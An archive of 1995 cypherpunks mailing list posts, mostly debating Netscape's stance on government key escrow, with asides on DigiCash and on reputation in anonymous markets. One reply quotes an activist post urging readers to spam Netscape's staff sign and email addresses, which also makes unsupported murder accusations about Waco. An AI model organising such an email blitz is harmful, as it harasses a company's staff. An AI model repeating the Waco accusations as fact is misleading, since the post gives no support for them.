To: master@internexus.net (Laszlo Vecsey)
Subject: Re: Netscape, Mosaic, and other goodies.
In-Reply-To: <Pine.LNX.3.91.951201231649.5324C-100000@micro.internexus.net>
Message-ID: <9512021309.AA26669@all.net>
MIME-Version: 1.0
Content-Type: text


...
> It's funny how one day we are raving about how great Netscape is, and the 
> next day we hate them. If we aren't pleased with a particular piece of 
> software, instead of argueing about it we should just go and make one 
> that we are pleased with. Using the many libraries available such as MPEG, 
> GIF, JPEG for example and releasing it under the GNU agreement is the way 
> to go. Or perhaps we should just back the original browser, NCSA Mosaic. 
> With some improvements it could once again be the best browser on the net.

Isn't it strange that the same people on this list who have been giving
abuse to those of us who have been warning you about Netscape - are now
coming to see that we were right all along?

My point is NOT what you may think it is (i.e., that we were right and
you were wrong).  My point is that people on this list are a little bit
too quick to jump to conclusions.  Some of you are now marching off in
opposition to Netscape based on a rumor about what someone from Netscape
said and a report of a grant by the NSA.  This sort of knee jerk reaction
is often inappropriate.

As to the idea of going with NCSA's mosaic, I'm all for it.  In fact,
that's the browser I've been using all along - mostly because it comes
in source form so I can modify it for my less-popular operating
environment, because there's no fee for its use, and because it's not a
hyped up commercial venture with a stock having a price to earnings ratio
of 7,000.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 21:30:58 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com>
Message-ID: <9512021318.AA27932@all.net>
MIME-Version: 1.0
Content-Type: text


>   I had lunch with Jim Clark today, and explained the furor that was
> currently going on in cypherpunks and elsewhere.  After lunch he sent
> me the e-mail that I've attached below to pass along.  I think the gist
> of it is that if governments require key escrow, we will have to do it
> in order to sell our products with encryption into those countries.

The point Netscape seems to miss is that by refusing to go with weak
crypto and having the best product on the market, Netscape may be able
to force these governments into a position of accepting it.

Suppose Netscape took the position that it was 512 bit RSA, and that it
was for sale to anyone who wanted to buy it? The result would either be
a billion dollars of market impact and a collapse of the high-tech stock
bubble we are now building, or the government backing down.

If the US government backed down, and Netscape became the best product
around and maintained that lead for a long time, other countries would
either have to allow Netscape in, or suffer the consequences of falling
behind in the IT curve.

The right move for Netscape is to improve crypto-security, to refuse to
give in to government, and to publicly vilify the people in government
who stand in their way.  When billions of dollars are at stake and the
blame is placed squarely on the shoulders of a politician trying to
claim economic improvements based on their policies, the politician is
likely to yield.


-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sun, 3 Dec 1995 11:16:11 +0800
To: cypherpunks@toad.com
Subject: Talking to Jim
Message-ID: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Gidday all

I emailed Jim Clark day before yesterday about his comments re key escrow.
He responded.  As it's not good form to post private email, might I suggest
that one of the 'elders' here put to Jim a list of questions on the proviso
that his answers can be posted to the list.  You never know, a lot of
speculation might be confirmed or denied.

cheers

Peter 


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Dec 1995 09:34:17 +0800
To: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Subject: Re: Talking to Jim
In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
Message-ID: <199512021417.JAA10944@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



PeterWiltshire writes:
> I emailed Jim Clark day before yesterday about his comments re key escrow.
> He responded.  As it's not good form to post private email, might I suggest
> that one of the 'elders' here put to Jim a list of questions on the proviso
> that his answers can be posted to the list.  You never know, a lot of
> speculation might be confirmed or denied.

Why doesn't he just post on his own? Its not like this mailing list is
unknown -- we got him bad press on the cover of the Times in the
past. Anyone is free to send email here.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 01:32:27 +0800
To: cypherpunks@toad.com
Subject: lance's netscape-gak page
Message-ID: <199512021718.JAA25725@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Lance asked me to announce his page to the list, if he fell asleep.

Looks like he hasn't announced it, so here's the announcement.

Lance's netscape-GAK page is available from his homepage at
http://www.obscura.com/~loki/

	the graphic is nice. ;-)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 2 Dec 1995 22:32:19 +0800
To: cypherpunks@toad.com
Subject: SHU_tup
Message-ID: <199512021424.JAA16245@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-2-95. NYPiper:

   "Accord Reached For Limiting Smut on Internet." Page One
   lead.

      Bowing to a seemingly unstoppable push in Congress to
      keep sexual material off the Internet, a coalition of
      commercial on-line services and some civil liberties
      groups agreed today to accept a number of restrictions
      they had opposed a few months ago.

   "Terrorism Bill Plan May Break Deadlock." Tiny article.

      In a bid to salvage a stalled antiterrorism bill, the
      chairman of the House Judiciary Committee has agreed to
      the demands of conservative Republicans to remove
      proposals expanding the Government's wiretapping
      authority.

   SHU_tup  (10 kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Dec 1995 22:46:27 +0800
To: cypherpunks@toad.com
Subject: Re: C'MON N' GIVE 'EM HELL, NET-NERDS!!!!
In-Reply-To: <m0tLhQS-00033cC@iquest.net>
Message-ID: <199512021438.JAA10983@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Okay, now that Linda Thompson seems to have trouble with Netscape, I
have to wonder if we are doing everything here right. I mean, she's a
nutcase, and although not everything nutcases say is insane, we have
to ask ourselves what is going on.

Perhaps we should wait a few days and ask Jim Clark for an official
position before doing anything to try to discourage the use of
Netscape browsers.

.pm

Linda Thompson, American Justice Federation writes:
> They asked for it:
> 
> "To secure Net communications, the government will need to
> have access to private data exchanges using what is known as a key escrow
> security system," -Netscape Communications chairman Jim Clark, arguing for
> a security system called key escrow that would require you to give the
> government access to your private messages.
> 
> Source: STAMPER'S NEWS NUGGETS 
> 
> (1)  SPAM THE SIGN
>  Netscape has a webpage at www.netscape.com.  There is a "toys" area and any
> message you leave in that area goes to an ELECTRONIC MARQUEE SIGN at
> Netscape that all the employees can see.  SPAM THAT SIGN.
> 
> (2) SPAM NETSCAPE
> 
> Here's where the EMAIL BLITZ should go (extra points for creativity):
> 
> info@netscape.com 
>      General information 
> 
> admgr@netscape.com 
>      Netscape site advertising sales 
> 
> x_cbug@netscape.com 
>      Bug reports from X Window users 
> 
> win_cbug@netscape.com 
>      Bug reports from Windows users 
> 
> mac_cbug@netscape.com 
>      Bug reports from Macintosh users 
> 
> hr@netscape.com 
>      Netscape Human Resources department 
> 
> training@netscape.com 
>      Netscape Training programs information 
> 
> admgr@netscape.com 
>      Netscape site advertising sales and Sponsor program information 
> 
> proprietor@netscape.com 
>      Netscape electronic store feedback 
> 
> editor@netscape.com 
>      Feedback about Netscape's Net site 
> 
> ssl-talk-request@netscape.com 
>      E-mail list for Secure Sockets Layer protocol discussion 
> 
> standards@netscape.com 
>      Questions about Netscape's open-standards activities 
> 
> nswinapi-talk-request@netscape.com 
>      E-mail list for users of the Windows Netscape Server API 
> CORPORATE HEADQUARTERS 
> 
> -------------------------------------------------------------
> 
> NETSCAPE COMMUNICATIONS CORPORATION 
>      501 E. Middlefield Rd.
>      Mountain View, CA 94043
>      415/528-2555 Product and sales information (7:00 a.m. to 5:00 p.m. PST)
>      415/254-1900 Executive offices
>      415/528-4124 Fax
>      http://www.netscape.com 
> 
> ATLANTA 
>      Netscape Communications Corporation
>      1850 Parkway Pl.
>      Suite 420
>      Marietta, GA 30067
> 
> CHICAGO 
>      Netscape Communications Corporation
>      2159 N. Seminary
>      Chicago, IL 60614
> 
> DALLAS 
>      Netscape Communications Corporation
>      17304 North Preston Road
>      Suite 800
>      Dallas, Texas 75252
> 
> NEW YORK 
>      Netscape Communications Corporation
>      599 Lexington Ave.
>      Suite 2300
>      New York, NY 10022
> 
> NORTHWEST 
>      Netscape Communications Corporation
>      501 Middlefield Rd.
>      Mountain View, CA 94043
> 
> SOUTHWEST 
>      Netscape Communications Corporation
>      111 N. Sepulveda Blvd.
>      Manhattan Beach, CA 90266
> 
> WASHINGTON, D.C. 
>      Netscape Communications Corporation
>      6701 Democracy Blvd.
>      Suite 300
>      Bethesda, MD 20817
> 
> THANKS AND A HAT TIP TO HELEN AT E.PLURIBUS  FOR GETTING ALL THE
> ADDRESSES!!!!!!!!
> Kind regards,
> 
> ***********************  V  *************************
>           DEATH TO THE NEW WORLD ORDER
> ****************************************************
> 
> Linda Thompson
> American Justice Federation
> Home of AEN News & news videos, "Waco, the Big Lie,"  "America Under Siege"
> 3850 S. Emerson Ave.
> Indianapolis, IN 46203
> Telephone:  (317) 780-5200
> Fax:  (317) 780-5209
> Internet:  lindat@iquest.net
> 
> **************************************************
>    Remember Waco.  The Murderers are still free.
> ***************************************************
> 
> The Army is going to courtmartial Spc. Michael New 
> for not wearing a U.N. uniform, but the Army won't
> courtmartial the members of the 160th and 158th
> Special Operations, 82nd Airborne, Ft. Hood Cav
> Members, and 10thMountain Division members 
> who helped MURDER CHILDREN at Waco.
> 
> What's wrong with this picture?
> 
> 
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Sun, 3 Dec 1995 12:08:28 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199512030330.UAA22240@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>That's today's method, more or less.  It doesn't address my needs.  The
>name you pick for your key may or may not mean anything to me.  It might be
>pronounceable, giving it some advantage over a radix-64 string, but it
>might also be non-unique, making it worthless as an identifier.
>
>What means something to me is whatever name (or symbol) I assign to the
>person behind the key in question.  That's the one in my mind and therefore
>the only one of interest to me.  You, however, don't know what's in my
>mind.  You don't even know my preferred symbol set.
>

Why not give it two names?  A local name that could be a icon or something,
and a universal name (i.e. MD5 hash of key)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 3 Dec 1995 02:51:42 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace64c8e0402100421f3@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


The Netscape browser chose the wrong time, this morning, to tell me that my
demo copy was about to expire.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 3 Dec 1995 00:03:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: DigiCash releases protocol specs!
Message-ID: <199512021557.KAA21782@homeport.org>
MIME-Version: 1.0
Content-Type: text



| By popular request, DigiCash is releasing the protocol specs.
|
| The specs are available at 
| http://www.digicash.com/ecash/protocol.html
|
| Please be aware that the doccument is work in progess. More 
| specifications, including byte level descriptions of the message 
| format will be added throughout the weekend.

	And of course, you'll be including a description of how you
generate random numbers for use in keys and blindings?  I ask only
because I didn't see a place for it on the Digicash site.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Sun, 3 Dec 1995 01:07:39 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography MPLS Book Release
Message-ID: <m0tLvGD-0004vjC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Did I mention that Bruce Schneier and Ms. Cooper are charming hosts
with an excellent caterer? Probably not, with all the Netscape/GAK
hoo-hah going on. 

Well, if you'll excuse me for posting thanks a couple of days late,
thanks for an excellent time. It was good to see some of the local
folks in person again.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 1995 01:48:03 +0800
To: cypherpunks@toad.com
Subject: Why Netscape employees should not leave...
Message-ID: <ace5cd0216021004c8fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:33 AM 12/2/95, sameer wrote:
>>
>> So, for a 15% reduction in salary and 30 days of job search, is it worth it?
>
>        30 days? in silicon valley? you *must* be joking. (i suppose
>the market for good net-folks isn't as big over on the right coast.)

Just a minor clarification. I don't speak for any of the Netscape employees
here (nor am I encouraging them to leave...they cay do *more* within
Netscape than merely be resigning in some sort of protest).

The _salary_ figure is not the key issue. Stock options are. Their stock
options were almost certainly priced before the big run-up in price these
last few months, and most likely priced at the IPO price or even lower. It
is quite likely that these stock options are worth far, far more than
salary.

True, other companies offer stock options, but their Netscape options are
already "in the money" by a wide margin, which is an incredible incentive
to stick around.

I'm critical of Netscape, like others are, on various issues. But I sure do
hope we never turn this criticism into suggestions that Jeff and the other
Netscape folks here should quit in protest. That smacks too much of "you're
working for the war machine!" stridency. (Next we'll be having people dump
buckets of blood over piles of Netscape Navigator at Fry's.)

I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal
on the actual issue of whether Netscape will build a U.S.-supported GAK (as
opposed to offering GAK for the Iraqis or French). I await with interest
the clarification of the anti-GAK stance that Jeff alluded to.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 3 Dec 1995 03:33:24 +0800
To: cypherpunks@toad.com
Subject: Netscape GAK page.
Message-ID: <ace657a40802100417e5@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have gone back and improved the "Netscape GAK?" page based on a good
nights sleep and some helpful suggestions (thanks you all who mailed me
about the page). I would appreciate feedback on the page, especially from
Netscape or its employees (in an official or unofficial capacity). I have
tried to be even handed in my presentation of the information, while not
hiding the fact that I strongly disagree with the stance that Netscape has
taken.

<http://www.obscura.com/~loki/GAK.html>

        -Lance



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMCoVPPzr81BVjMVAQF5vQf/R1AgxAEhjR8AkD29WbRFHqA7wpw5R6dq
B2YJGM9J2g5g9y6gf/YKTGVp/Lp4qmExhi3zZPkOsHefF/xufBZ7N42depO9F0dS
cqGcCq8+qhTYeNhjjqMn1DgM9oeuVJdDCF1KUonUhQiiWthTAlgFLsWwcQznq7FK
J533laBREzrXmxAQbfxnw/cc7J9wRPuzUgDQ61RlO8x1VtZxugSvbVpFDpDBYL1A
W028bnKJfK52cp6nliKjjk6k5ElccPsLk82mS0Fyhfh+Gt4QMLx+UHuKgaVwGHsa
m6sAXMxuWDg2x3myW0NKxs8qj9hDZzwG4T7/QFSKbkQkQGFIvWa+Fw==
=h3v6
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 04:03:22 +0800
To: unicorn@polaris.mindport.net (Black Unicorn)
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202140203.1199A-100000@polaris.mindport.net>
Message-ID: <199512021936.LAA09776@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> With which firm?  Or have you made it an in-house effort?
> 

	There was no Netscape (or RSADSI, for that matter [an RSADSI
employee showed up, but it was on his own time]) representative at the
recent Bernstein hearing in SF. I think that shows how much they
really care.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 01:11:21 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: FW: websurfer 4.6 (fwd)
Message-ID: <Pine.SUN.3.91.951202115438.2073D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


so much for compatibility....guess I'm sticking with netscape for now.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

---------- Forwarded message ----------
Date: Fri, 1 Dec 95 16:49:34 PST
>From: Netmanage Technical Support <Support@netmanage.com>
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: FW: websurfer 4.6 


Hello,

Thank you for emailing NetManage Technical Support. WebSurfer 4.6 was
designed to work on Winsock 1.1 compliant systems. Since you are
running Winsock version 2.0 this may be the reason for the
application not working. We will report this to Engineering so
hopefully in a future release WebSurfer might be able to support
this new Winsock version.

Thank you for considering Chameleon WebSurfer,

Support@netmange.com
==
[earlier, I had said:]

won't start on my pentium 100 w/ 20Mb running qemm 7.04, windows 3.11, 
winsock 2.0 rev B on a novell 3.x LAN.

Netscape runs fine.

This might help:
Trumpet Winsock Version 2.0 Revision B
Copyright (c) 1993,1994 by Peter R. Tattam
All Rights Reserved.
THIS IS AN UNREGISTERED SHAREWARE VERSION FOR EVALUATION ONLY.
Ethernet address = 00:00:F4:D2:64:D3
WINPKT packet driver located on vector $66
IP buffers = 32
Performing bootp...Bootp successful
My IP = 129.171.188.92 netmask = 255.255.255.0 gateway = 129.171.188.1
Task WEBSURF(22E7) did not call WSACleanup.
Task WEBSURF(38EF) did not call WSACleanup.


-----------------End of Original Message-----------------

If responding to a previous message please include the original for our reference. To ensure a faster  reply be sure to reply to 'support@netmanage.com' and not to individual sender of 
messages.

--         /\ 
**********/@@\ *********************************
          \__/      NetManage Inc.
       W   AA   W   Home of Chameleon TCPIP for Windows
       |__AYA__/    TCPIP Apps for Windows and NT
         AXXV          
         VXXV          
      W  VUV   W      Technical Support  (408)973-8181
      |_/ V \_/ __        Fax (408)973-8272 
           \   [_ \             
            \_____/    MIME enclosures are OK 
                              gopher server: gopher.netmanage.com
	             www:   http:/www.netmanage.com
                   
For a list of current NetManage products use WebSurfer and go to:     http://www.netmanage.com:80/netmanage/products/upgrade.html

Serendipity
11/20/95
10:36:42 AM

This message was sent by Chameleon 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 01:15:58 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: DigiCash releases protocol specs!
In-Reply-To: <9512012324.AA01808@ch1d157nwk>
Message-ID: <Pine.SUN.3.91.951202120534.2073G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Absolutely.  Now if I can just get Hal to translate these into English 
for me....

On Fri, 1 Dec 1995, Andrew Loewenstern wrote:

> >  By popular request, DigiCash is releasing the protocol specs.
> 
> Three cheers to DigiCash, Mark Twain, and Lucky!
> 
> andrew
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 3 Dec 1995 04:41:38 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512022024.MAA08119@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat 2 Dec 1995 05:24 one of the Alices wrote on the subject 
of Jim's comments about "bubbles" and such, and ended up automatically filtered to my Deleted folder (THAT will teach me to be curious about what ends up there!):

> The market seems to "think" that it's a better present judge 
> of what Netscape has than he does.  It's almost as though 
> the "market" has developed a "mind" of its own.  

Well, of course! Markets are the most efficient integration of the minds of the participants, hands down.

> It's own particular neural network.  

Exactly. Literally. And huge, too.

> It's almost as though there is automated software at work. 

There is: Wetware. Massive concurrent processing, heavy parallelism, inefficient I/O. Distributed, redundant memory. Inefficient but infinitely adaptable interprocessor routing. Capable of handling any degree of outage. All elements individually expendable. Self-replicating processors that have significant lead time but integrate smoothly into the net. Designs and builds its own outboard peripherals and interconnects. Best damned planetary computing system in this star system. But I diverge...

It's not always right (though self-fulfilling prophecy is often a big part of the equation), and it often misses the anolamies, but because it IS an integration is precisely why it may mean something different than you suggest.

It may in fact be the best barometer we have of the true depth of the exploding Internet phenomenon.  Completely aside from the question of whether or not the seeming Netscape overvaluation bubble bursts, etc., Netscape's share price more directly reflects the personal involvement and upward view of real people with respect to the Internet/WWW than anything else we have.

Remember, there are still naysayers out there, declaiming in places from books to columns to TV, while the reality is that computers are now outselling televisions, and a key new form of synergistic human communication is exploding in exponential growth.  Humans deal on a personal level only moderately well with linear processes, and poorly with geometric processes -- it's understandable that the growth of the Internet/WWW and the implications of thereof would be late in being recognized and be incorrectly understood until sometime AFTER the changes have rocked the society.

Markets, though, more accurately reflect what people are actually doing, what they are willing to do, and what they think "in their gut" will happen.  While they also reflect what people might LIKE to happen, they reflect, too, that what people WANT to happen, their desires often MAKE happen.  Capitalize ME to the tune of $5 billion, for instance, and I may be influential not only during the course of your life but the lives of your great-grandchildren.

Selling Netscape short may or may not be a wise move -- selling market processes short is usually a fool's exercise in self-delusion.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMCsBEjw99YhtpnhAQE04QH8C+jk59lxyAqkVlfhd2VLw3TJKnECdXXJ
fNE7S0QZyd5eqFnZ4wTyHeX18YfTg+xiFZPPfxpRCdgO/x2K8sxFWQ==
=/2cN
-----END PGP SIGNATURE-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Dec 1995 01:49:36 +0800
To: cypherpunks@toad.com
Subject: EXO_ner
Message-ID: <199512021734.MAA03028@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


SenXon and The Washrag blow today about which has the most to 
be ashamed of and hide from the filthy lingerie leering 
republic.


EXO_ner  (sheer kb)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Dec 1995 05:33:05 +0800
To: cypherpunks@toad.com
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <199512022116.NAA11199@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to be so late picking up this thread, but I was very busy this past
week.

Wei Dai <weidai@eskimo.com> writes:
>Can you elaborate more on why the analysis is inadequate?  (I know it 
>probably isn't adequate, but why do you think so?)

"Reputation" is a fairly broad concept.  It generally refers to our
expectations of how some person will behave in various circumstances.  To
some extent, every character trait can have a reputation associated with
it.  A person can have a reputation for honesty, for efficiency, for
steadiness, for accuracy, and so on.  Even looking at it solely from the
point of view of a consumer choosing a service provider, any or all of
these traits might be important depending on the situation.  If I need
the work done right away, I will choose a supplier with a reputation for
speed.  If I want to be sure it is right and doesn't have to be redone, I
will chose one with a reputation for care and accuracy, and so on.

I don't think the notion of a graph showing utility (an overall summing
up of value to me) versus cost really captures this notion.  Such a graph
is useful and adequate for some forms of economic analysis where certain
simplifying assumptions are made, but I don't think it will work in this
case.  One of the big issues we would want to analyze is the impact of
various sets of rules and conventions for how trades occur.  The question
is how trust could be established, or how trade could occur in its
absence, given the possibility of avoiding retribution for dishonest
behavior that anonymous communication allows.  In this analysis we are
going to need more information than just utility vs price.  We will need
to separate out those various factors which go to make up the utility.

Changing the market conventions (say, by introducing escrow agencies)
will change the weightings of the various factors that make up
utility.  If I no longer have to trust the honesty of the person I am
trading with (because we have an escrow agency to help us make the
exchange) then the importance of his reputation for honesty goes down.
The result is that the "reputation" curves will change rather
dynamically and unpredictably as we consider different possible
structures in the market.  This will make the analysis of them
intractable, I would think.

As I wrote before, it makes more sense to me to focus explicitly on the
issue of trust and honesty, since those seem to be the main issues which
are going to take on more importance in an anonymous market.  Yes, they
are important in already existing markets, too, and there are plenty of
fly by night, hole in the wall companies which exist solely to do
business dishonestly and then evade retribution.  But the ease of doing
these things could increase in an anonymous market.

The other fact that makes trustworthiness more important in such a
market is the cost it applies.  One of the potential benefits of
anonymity is privacy.  To establish trust by keeping a steady pseudonym
(as was suggested earlier, a trade name or brand name performs this
function even as companies and personnel change out from under it)
means giving up a certain level of privacy.  Even if the trade name is
controlled pseudonymously, the linkability of its transactions
represents a form of exposure which can be seen as a cost.  If the only
way to be successful in business is to give up some of the privacy that
anonymity would provide by working through a consistent pseudonym, that
would be an interesting result.  Again, the issue is primarily one of
trustworthiness, as I see it.

I do think the idea of analyzing costs in terms of "throwing away your
reputation" by cheating and starting anew is an interesting approach.
The question is whether you can really quantify the value of a
reputation.  I know in business now corporations do carry on their books
something called "good will" which I believe is roughly the value of
their good name and trade marks.  However it is not normally considered
to be a major asset, I think.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 3 Dec 1995 02:58:10 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Netscape employees should not leave...
Message-ID: <v02130502ace652b201d3@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Of course given the great market success of the other Clipper
products, I wouldn't be counting my stock options before they
hatch. Browsers are not that complicated. Nor are HTTP servers.
A US-only, truly secure system would be easy to build. SSL is
designed to be expanded to include new algorithms. It's pretty
good in that respect.

If I were considering launching a Clipperized Browser, I would
really consider the negative effect it would have on its
marketability and its stock price.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:19:04 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C016E6.6264@netscape.com>
Message-ID: <Pine.SUN.3.91.951202140203.1199A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > 
> > On Fri, 1 Dec 1995, Jeff Weinstein wrote:

> > >   See my recent message to this list.  We will be taking an anti-GAK
> > > position.
> > 
> > So you will refuse to implement GAK in future version of netscape then?
> > Or you will merely do lipservice to the GAK policies at the conference?
> > 
> > I think the distinction is quite key.
> 
>   If the law requires GAK, then I believe that we will implement it rather
> than just disable encryption.  We are taking a position against GAK and
> will continue to lobby against it.  We are planning to continue to do both
> US and Export versions, so I don't think that the government's ploy of
> trying to lure companies into weakening their domestic versions will work.

AT&T seems to have been suitably 'incentivized'
The receipt of government funding (in whatever guise) might be just as 
powerful in this case.

To the outsider, it looks as if Netscape 'owes' the government.

> We released a 128-bit version of our product almost a year ago, at a
> time when many companies were providing only weak crypto in their domestic
> products so that they didn't have to trouble themselves with two versions.

And this is impressive.  Stamina, however, is much more difficult.

> We are actively lobbying in washington to get clarification of the
> current regulations so that we can provide the US version via an "export
> controlled" FTP or HTTP download.

With which firm?  Or have you made it an in-house effort?

> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
